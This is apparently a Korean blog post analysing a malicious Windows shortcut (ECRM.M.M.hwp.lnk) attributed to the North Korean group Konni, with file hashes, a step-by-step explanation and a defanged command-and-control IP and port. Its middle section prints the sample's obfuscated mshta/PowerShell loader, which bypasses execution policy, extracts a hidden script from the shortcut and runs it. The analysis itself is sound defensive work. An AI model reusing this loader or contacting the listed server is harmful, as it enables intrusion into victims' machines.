북한 해킹 그룹 Konni(코니)에서 만든 악성코드-ECRM.M.hwp.lnk(<-가칭,2025.3.24)

오늘은 북한 해킹 그룹 Konni(코니)에서 만든 악성코드에서 만든 악성코드 ECRM.M.M.hwp.lnk(<-가칭,2025.3.24)에 대해 글을 적어보겠습니다. 일단 저번에 알아본 ECRM.M.M.hwp.lnk 하고 비슷합니다.
파일명:ECRM.M.M.hwp.lnk
사이즈:1 MB
MD5:6da06e1e7b9e8e5eb9f199b0fbcf811a
SHA-1:6ae124c02d58737ba8b74e1f2da6b45ea369f1df
SHA-256:6fb3dfe451b37b0304a42e62759bf3670d5b4dd0232621dac0739061fa4704e2

악성코드 에 포함된 파워셀 코드

악성코드 에 포함된 코드

StringData
{
    namestring: not present
    relativepath: ..\..\..\Windows\System32\mshta(.)exe
    workingdir: not present
    commandlinearguments: javascript:a="pow"(+)"ershell -ep bypa"(+)"ss ";g="c:\\p
    ro"(+)"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Ski
    p 0x(0)8e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"(+)"ript.Shell');a.Run(c,0
    ,true);close();";c=a(+)"-c $t=0x17cb;$k = Get-(C)hildItem *.lnk | where-object
    {$_.length -eq $t} | Select-Ob(j)ect -ExpandProperty Name;if($k.co"+"unt -eq 0
    ){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-(o)bject{$_.length -eq $t
    };};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);
    iconlocation: .xls
}

코드 분석

Windows의 정식 시스템 파일인 mshta.exe를 악용하여 JavaScript를 실행하고 PowerShell 명령어를 생성 및 실행하도록 설계
mshta.exe 는 Windows에 기본 포함된 도구로 HTML 애플리케이션(HTA) 을 실행하는 데 사용
1. 명령어 디코딩 및 분석
전체 PowerShell 명령어 문자열(c)을 구성
PowerShell의 실행 정책을 우회 어떤 스크립트든지 실행할 수 있도록 설정
보안 기능 우회(BYPASS) 목적
.lnk 파일 (바로가기 파일)을 탐색

악성코드 e.ps1 내부 모습

크기가 정확히 0x17cb (10진수 6091바이트) 인 파일만 필터링
2. TEMP 폴더에서도 탐색
현재 디렉토리에서 못 찾으면 사용자 TEMP 폴더 내 모든 서브 디렉터리를 탐색
3..lnk 파일을 바이트로 읽어서 페이로드 추출
.lnk 파일을 바이트 단위로 읽어들여서 처음 0x8e4 바이트(10진수 2,276바이트)를 건너뛰고 나머지 데이터를 추출
4. 추출된 데이터를 파일로 저장
추출된 데이터를 e.ps1이라는 PowerShell 스크립트 파일로 저장

악성코드 k.zip 에 포함된 파일들

5. 저장된 스크립트를 다시 실행
저장한 e.ps1 파일을 다시 PowerShell을 통해 실행
e.ps1 분석
64(.)20(.)59(.)148
이걸 읽으면

ProcessExplorer 본 악성코드 실행

IP 주소를 문자열로 저장하고 거꾸로 저장하거나 Base64로 인코딩하거나 문자 배열로 나누고 재조합
64(.)20(.)59(.)148
cbbsU[1]->포트 5588
이렇게 공격도 하니 항상 조심하시는 것을 권장합니다.